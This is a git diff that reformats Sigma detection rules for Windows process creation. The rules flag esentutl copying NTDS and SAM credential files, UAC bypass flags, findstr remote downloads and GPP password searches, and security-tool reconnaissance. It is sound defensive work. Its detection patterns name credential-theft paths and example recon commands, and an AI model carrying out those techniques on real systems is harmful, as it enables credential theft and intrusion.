\DumpMinitool.exe + - \DumpMinitool.x86.exe + - \DumpMinitool.arm64.exe + - OriginalFileName: + - DumpMinitool.exe + - DumpMinitool.x86.exe + - DumpMinitool.arm64.exe filter_folder: Image|contains: - \Microsoft Visual Studio\ - - \Extensions\ + - \Extensions\ # https://github.com/microsoft/vstest/blob/b2e2126f1aa7e5753cafe9515563c99ade6a59ce/src/package/nuspec/Microsoft.TestPlatform.Portable.nuspec#L159 susp_flags: - CommandLine|contains: .txt + CommandLine|contains: .txt cmd_has_flags: - CommandLine|contains: + CommandLine|contains: - ' Full' - ' Mini' - ' WithHeap' filter_cmd_misses_flags: - CommandLine|contains: --dumpType - condition: process_creation and (selection and ( ( not filter_folder ) or susp_flags - or ( cmd_has_flags and not filter_cmd_misses_flags ) )) + CommandLine|contains: --dumpType + condition: process_creation and (selection and ( ( not filter_folder ) or susp_flags or ( cmd_has_flags and not filter_cmd_misses_flags ) )) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_esentutl_params.yml b/sigma/sysmon/process_creation/proc_creation_win_esentutl_params.yml index 9f71072db..e446a7c60 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_esentutl_params.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_esentutl_params.yml @@ -1,9 +1,7 @@ title: Esentutl Gather Credentials id: 7df1713a-1a5b-4a4b-a071-dc83b144a101 status: test -description: Conti recommendation to its affiliates to use esentutl to access NTDS - dumped file. Trickbot also uses this utilities to get MSEdge info via its module - pwgrab. +description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. references: - https://twitter.com/vxunderground/status/1423336151860002816 - https://attack.mitre.org/software/S0404/ @@ -24,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - esentutl - ' /p' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml b/sigma/sysmon/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml index 9150a11a3..e7d0d2750 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml @@ -1,8 +1,7 @@ title: Copying Sensitive Files with Credential Data id: e7be6119-fc37-43f0-ad4f-1f3f99be2f9f status: test -description: Files with well-known filenames (sensitive files with credential data) - copying +description: Files with well-known filenames (sensitive files with credential data) copying references: - https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/ - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment @@ -25,19 +24,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_esent_img: - - Image|endswith: \esentutl.exe - - OriginalFileName: \esentutl.exe + - Image|endswith: \esentutl.exe + - OriginalFileName: \esentutl.exe selection_esent_cli: - CommandLine|contains: + CommandLine|contains: - vss - ' /m ' - ' /y ' selection_susp_paths: - CommandLine|contains: + CommandLine|contains: - \windows\ntds\ntds.dit - \config\sam - \config\security - - '\config\system ' + - '\config\system ' # space needed to avoid false positives with \config\systemprofile\ - \repair\sam - \repair\system - \repair\security @@ -46,7 +45,6 @@ detection: - \config\RegBack\security condition: process_creation and (all of selection_esent_* or selection_susp_paths) falsepositives: - - Copying sensitive files for legitimate use (eg. backup) or forensic investigation - by legitimate incident responder or forensic invetigator + - Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_esentutl_webcache.yml b/sigma/sysmon/process_creation/proc_creation_win_esentutl_webcache.yml index 8742a5b58..f917c4011 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_esentutl_webcache.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_esentutl_webcache.yml @@ -1,8 +1,7 @@ title: Esentutl Steals Browser Information id: 6a69f62d-ce75-4b57-8dce-6351eb55b362 status: test -description: One way Qbot steals sensitive information is by extracting browser data - from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe +description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe references: - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/ - https://redcanary.com/threat-detection-report/threats/qbot/ @@ -22,14 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \esentutl.exe - - OriginalFileName: esentutl.exe + - Image|endswith: \esentutl.exe + - OriginalFileName: esentutl.exe selection_flag: - CommandLine|contains: + CommandLine|contains: - /r - -r selection_webcache: - CommandLine|contains: \Windows\WebCache + CommandLine|contains: \Windows\WebCache condition: process_creation and (all of selection*) falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_eventvwr_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_eventvwr_susp_child_process.yml index 262be54e3..ddba381d7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_eventvwr_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_eventvwr_susp_child_process.yml @@ -1,11 +1,10 @@ title: Potentially Suspicious Event Viewer Child Process id: be344333-921d-4c4d-8bb8-e584cf584780 related: - - id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 - type: derived + - id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 + type: derived status: test -description: Detects uncommon or suspicious child processes of "eventvwr.exe" which - might indicate a UAC bypass attempt +description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt references: - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100 diff --git a/sigma/sysmon/process_creation/proc_creation_win_expand_cabinet_files.yml b/sigma/sysmon/process_creation/proc_creation_win_expand_cabinet_files.yml index 98295779d..c907f6a71 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_expand_cabinet_files.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_expand_cabinet_files.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious Cabinet File Expansion id: 9f107a84-532c-41af-b005-8d12a607639f status: test -description: Detects the expansion or decompression of cabinet files from potentially - suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks +description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks references: - https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll - https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/ @@ -22,11 +21,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: Image|endswith: \expand.exe - CommandLine|contains: + CommandLine|contains: - '/F:' - '-F:' selection_folders_1: - CommandLine|contains: + CommandLine|contains: - :\Perflogs\ - :\Users\Public\ - \Temporary Internet @@ -35,20 +34,20 @@ detection: - \AppData\Roaming\Temp - :\Windows\Temp selection_folders_2: - - CommandLine|contains|all: - - :\Users\ - - \Favorites\ - - CommandLine|contains|all: - - :\Users\ - - \Favourites\ - - CommandLine|contains|all: - - :\Users\ - - \Contacts\ + - CommandLine|contains|all: + - :\Users\ + - \Favorites\ + - CommandLine|contains|all: + - :\Users\ + - \Favourites\ + - CommandLine|contains|all: + - :\Users\ + - \Contacts\ filter_optional_dell: + # Launched by Dell ServiceShell.exe ParentImage: C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe - CommandLine|contains: C:\ProgramData\Dell\UpdateService\Temp\ - condition: process_creation and (selection_cmd and 1 of selection_folders_* and - not 1 of filter_optional_*) + CommandLine|contains: C:\ProgramData\Dell\UpdateService\Temp\ + condition: process_creation and (selection_cmd and 1 of selection_folders_* and not 1 of filter_optional_*) falsepositives: - System administrator Usage level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_explorer_break_process_tree.yml b/sigma/sysmon/process_creation/proc_creation_win_explorer_break_process_tree.yml index 718f02a05..1251e9afc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_explorer_break_process_tree.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_explorer_break_process_tree.yml @@ -1,20 +1,15 @@ title: Explorer Process Tree Break id: 949f1ffb-6e85-4f00-ae1e-c3c5b190d605 status: test -description: 'Detects a command line process that uses explorer.exe to launch arbitrary - commands or binaries, - - which is similar to cmd.exe /c, only it breaks the process tree and makes its - parent a new instance of explorer spawning from "svchost" - - ' +description: | + Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, + which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" references: - https://twitter.com/CyberRaiju/status/1273597319322058752 - https://twitter.com/bohops/status/1276357235954909188?s=12 - https://twitter.com/nas_bench/status/1535322450858233858 - https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/ -author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), - @gott_cyber +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber date: 2019/06/29 modified: 2022/09/20 tags: @@ -29,10 +24,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|contains: /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} - - CommandLine|contains|all: - - explorer.exe - - ' /root,' + # See CLSID_SeparateMultipleProcessExplorerHost in the registry for reference + - CommandLine|contains: /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} # This will catch, the new explorer spawning which indicates a process/tree break. But you won't be able to catch the executing process. For that you need historical data + # There exists almost infinite possibilities to spawn from explorer. The "/root" flag is just an example + # It's better to have the ability to look at the process tree and look for explorer processes with "weird" flags to be able to catch this technique. + - CommandLine|contains|all: + - explorer.exe + - ' /root,' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_explorer_lolbin_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_explorer_lolbin_execution.yml index 36931bb62..e431fed42 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_explorer_lolbin_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_explorer_lolbin_execution.yml @@ -21,7 +21,7 @@ detection: selection: Image|endswith: \explorer.exe ParentImage|endswith: \cmd.exe - CommandLine|contains: explorer.exe + CommandLine|contains: explorer.exe condition: process_creation and selection falsepositives: - Legitimate explorer.exe run from cmd.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_explorer_nouaccheck.yml b/sigma/sysmon/process_creation/proc_creation_win_explorer_nouaccheck.yml index 7bf165e9a..2b6cbc52b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_explorer_nouaccheck.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_explorer_nouaccheck.yml @@ -1,9 +1,7 @@ title: Explorer NOUACCHECK Flag id: 534f2ef7-e8a2-4433-816d-c91bccde289b status: test -description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag - that allows to run all sub processes of that newly started explorer.exe without - any UAC checks +description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks references: - https://twitter.com/ORCA6665/status/1496478087244095491 author: Florian Roth (Nextron Systems) @@ -22,10 +20,10 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \explorer.exe - CommandLine|contains: /NOUACCHECK + CommandLine|contains: /NOUACCHECK filter_dc_logon: - - ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule - - ParentImage: C:\Windows\System32\svchost.exe + - ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule + - ParentImage: C:\Windows\System32\svchost.exe # coarse filter needed for ID 4688 Events condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Domain Controller User Logon diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_download.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_download.yml index 848b4e504..392b6f3a5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_findstr_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_download.yml @@ -1,20 +1,16 @@ title: Remote File Download Via Findstr.EXE id: 587254ee-a24b-4335-b3cd-065c0f1f4baa related: - - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f - type: obsoletes + - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f + type: obsoletes status: experimental -description: 'Detects execution of "findstr" with specific flags and a remote share - path. This specific set of CLI flags would allow "findstr" to download the content - of the file located on the remote share as described in the LOLBAS entry. - - ' +description: | + Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry. references: - https://lolbas-project.github.io/lolbas/Binaries/Findstr/ - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f -author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali - (Nextron Systems) +author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) date: 2020/10/05 modified: 2023/11/12 tags: @@ -32,19 +28,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_findstr: - - CommandLine|contains: findstr - - Image|endswith: findstr.exe - - OriginalFileName: FINDSTR.EXE + - CommandLine|contains: findstr + - Image|endswith: findstr.exe + - OriginalFileName: FINDSTR.EXE selection_cli_download_1: - CommandLine|contains: + CommandLine|contains: - ' /v ' - ' -v ' selection_cli_download_2: - CommandLine|contains: + CommandLine|contains: - ' /l ' - ' -l ' selection_cli_download_3: - CommandLine|contains: \\\\ + CommandLine|contains: \\\\ condition: process_creation and (selection_findstr and all of selection_cli_download_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_gpp_passwords.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_gpp_passwords.yml index d1c8316ef..638a1f4f5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_findstr_gpp_passwords.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_gpp_passwords.yml @@ -1,8 +1,7 @@ title: Findstr GPP Passwords id: 91a2c315-9ee6-4052-a853-6f6a8238f90d status: test -description: Look for the encrypted cpassword value within Group Policy Preference - files on the Domain Controller. This value can be decrypted with gpp-decrypt. +description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr author: frack113 @@ -20,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - Image|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - cpassword - \sysvol\ - .xml diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_lnk.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_lnk.yml index 32eb35f44..1aa0d6a01 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_findstr_lnk.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_lnk.yml @@ -1,8 +1,7 @@ title: Findstr Launching .lnk File id: 33339be3-148b-4e16-af56-ad16ec6c7e7b status: test -description: Detects usage of findstr to identify and execute a lnk file as seen within - the HHS redirect attack +description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack references: - https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/ author: Trent Liffick @@ -22,14 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - Image|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_cli: - CommandLine|endswith: + CommandLine|endswith: - .lnk - .lnk" - .lnk' diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_lsass.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_lsass.yml index a9c57454e..4648778a6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_findstr_lsass.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_lsass.yml @@ -1,8 +1,7 @@ title: LSASS Process Reconnaissance Via Findstr.EXE id: fe63010f-8823-4864-a96b-a7b4a0f7b929 status: experimental -description: Detects findstring commands that include the keyword lsass, which indicates - recon actviity for the LSASS process PID +description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID references: - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 author: Florian Roth (Nextron Systems) @@ -20,16 +19,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_findstr_img: - - Image|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - Image|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_findstr_cli: - CommandLine|contains: lsass + CommandLine|contains: lsass selection_special: - CommandLine|contains: + CommandLine|contains: - ' /i "lsass' - ' /i lsass.exe' - findstr "lsass diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_recon_everyone.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_recon_everyone.yml index 8b88195b1..53fbf851e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_findstr_recon_everyone.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_recon_everyone.yml @@ -1,9 +1,7 @@ title: Permission Misconfiguration Reconnaissance Via Findstr.EXE id: 47e4bab7-c626-47dc-967b-255608c9a920 status: experimental -description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This - is seen being used in combination with "icacls" to look for misconfigured files - or folders permissions +description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This is seen being used in combination with "icacls" to look for misconfigured files or folders permissions references: - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ author: Nasreddine Bencherchali (Nextron Systems) @@ -21,20 +19,24 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_findstr_img: - - Image|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - Image|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_findstr_cli: - CommandLine|contains: + CommandLine|contains: - '"Everyone"' - - '''Everyone''' + - "'Everyone'" - '"BUILTIN\\"' - - '''BUILTIN\''' + - "'BUILTIN\\'" selection_special: - CommandLine|contains|all: + CommandLine|contains|all: + # Example CLI would be: icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone" + # You could extend it for other groups and users + # Example: icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" + # Note: This selection only detects the command when executed from a handler such as a "cmd /c" or "powershell -c" - 'icacls ' - 'findstr ' - Everyone diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_recon_pipe_output.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_recon_pipe_output.yml index 25d9e9c8b..e1fe22706 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_findstr_recon_pipe_output.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_recon_pipe_output.yml @@ -1,15 +1,11 @@ title: Recon Command Output Piped To Findstr.EXE id: ccb5742c-c248-4982-8c5c-5571b9275ad3 related: - - id: fe63010f-8823-4864-a96b-a7b4a0f7b929 - type: derived + - id: fe63010f-8823-4864-a96b-a7b4a0f7b929 + type: derived status: experimental -description: 'Detects the excution of a potential recon command where the results - are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" - via the "/c" or "/k" for example. Attackers often time use this to extract specific - information they require in their chain. - - ' +description: | + Detects the excution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. Attackers often time use this to extract specific information they require in their chain. references: - https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist - https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf @@ -29,7 +25,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # Note: Add additional CLI to increase and enhance coverage - 'ipconfig /all | find ' - 'ipconfig /all | findstr ' - 'ipconfig | find ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml index 0509a625a..0de1c8aa0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml @@ -1,16 +1,12 @@ title: Security Tools Keyword Lookup Via Findstr.EXE id: 4fe074b4-b833-4081-8f24-7dcfeca72b42 related: - - id: fe63010f-8823-4864-a96b-a7b4a0f7b929 - type: derived + - id: fe63010f-8823-4864-a96b-a7b4a0f7b929 + type: derived status: experimental -description: 'Detects execution of "findstr" to search for common names of security - tools. Attackers often pipe the results of recon commands such as "tasklist" or - "whoami" to "findstr" in order to filter out the results. - +description: | + Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. This detection focuses on the keywords that the attacker might use as a filter. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ @@ -30,14 +26,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - Image|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_cli: - CommandLine|endswith: + CommandLine|endswith: + # Note: Add additional keywords to increase and enhance coverage + # Note: + # We use the double quote variation because in cases of where the command is executed through cmd for example: + # cmd /c "tasklist | findstr virus" + # Logging utilties such as Sysmon would capture the end quote as part of findstr execution - ' avira' - ' avira"' - ' cb' diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_subfolder_search.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_subfolder_search.yml index d2011bf97..977525dc2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_findstr_subfolder_search.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_subfolder_search.yml @@ -1,21 +1,16 @@ title: Insensitive Subfolder Search Via Findstr.EXE id: 04936b66-3915-43ad-a8e5-809eadfd1141 related: - - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f - type: obsoletes + - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f + type: obsoletes status: experimental -description: 'Detects execution of findstr with the "s" and "i" flags for a "subfolder" - and "insensitive" search respectively. Attackers sometimes leverage this built-in - utility to search the system for interesting files or filter through results of - commands. - - ' +description: | + Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands. references: - https://lolbas-project.github.io/lolbas/Binaries/Findstr/ - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f -author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali - (Nextron Systems) +author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) date: 2020/10/05 modified: 2023/11/12 tags: @@ -33,15 +28,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_findstr: - - CommandLine|contains: findstr - - Image|endswith: findstr.exe - - OriginalFileName: FINDSTR.EXE + - CommandLine|contains: findstr + - Image|endswith: findstr.exe + - OriginalFileName: FINDSTR.EXE selection_cli_search_subfolder: - CommandLine|contains: + CommandLine|contains: - ' /s ' - ' -s ' selection_cli_search_insensitive: - CommandLine|contains: + CommandLine|contains: - ' /i ' - ' -i ' condition: process_creation and (selection_findstr and all of selection_cli_search_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml b/sigma/sysmon/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml index 5e1957fd1..d7d793c4b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml @@ -1,9 +1,7 @@ title: Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE id: 37db85d1-b089-490a-a59a-c7b6f984f480 status: test -description: Detects usage of "findstr" with the argument "385201". Which could indicate - potential discovery of an installed Sysinternals Sysmon service using the default - driver altitude (even if the name is changed). +description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service author: frack113 @@ -21,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - Image|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_cli: - CommandLine|contains: ' 385201' + CommandLine|contains: ' 385201' # Sysmon driver default altitude condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_finger_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_finger_usage.yml index 93a5b9f55..30ca27513 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_finger_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_finger_usage.yml @@ -1,8 +1,7 @@ title: Finger.exe Suspicious Invocation id: af491bca-e752-4b44-9c86-df5680533dbc status: test -description: Detects suspicious aged finger.exe tool execution often used in malware - attacks nowadays +description: Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays references: - https://twitter.com/bigmacjpg/status/1349727699863011328?s=12 - https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/ @@ -22,8 +21,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: finger.exe - - Image|endswith: \finger.exe + - OriginalFileName: finger.exe + - Image|endswith: \finger.exe condition: process_creation and selection falsepositives: - Admin activity (unclear what they do nowadays with finger.exe) diff --git a/sigma/sysmon/process_creation/proc_creation_win_fltmc_unload_driver.yml b/sigma/sysmon/process_creation/proc_creation_win_fltmc_unload_driver.yml index bd7769cc7..aee8acc06 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_fltmc_unload_driver.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_fltmc_unload_driver.yml @@ -1,8 +1,8 @@ title: Filter Driver Unloaded Via Fltmc.EXE id: 4931188c-178e-4ee7-a348-39e8a7a56821 related: - - id: 4d7cda18-1b12-4e52-b45c-d28653210df8 - type: derived + - id: 4d7cda18-1b12-4e52-b45c-d28653210df8 # Sysmon specific + type: derived status: test description: Detect filter driver unloading activity via fltmc.exe references: @@ -25,12 +25,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \fltMC.exe - - OriginalFileName: fltMC.exe + - Image|endswith: \fltMC.exe + - OriginalFileName: fltMC.exe selection_cli: - CommandLine|contains: unload + CommandLine|contains: unload filter_avira: - CommandLine|endswith: unload rtp_filesystem_filter + # ParentImage: C:\Users\ciadmin\AppData\Local\Temp\is-URCLK.tmp\endpoint-protection-installer-x64.tmp + CommandLine|endswith: unload rtp_filesystem_filter condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml b/sigma/sysmon/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml index ebe6cc875..9af0b8289 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml @@ -1,8 +1,8 @@ title: Sysmon Driver Unloaded Via Fltmc.EXE id: 4d7cda18-1b12-4e52-b45c-d28653210df8 related: - - id: 4931188c-178e-4ee7-a348-39e8a7a56821 - type: similar + - id: 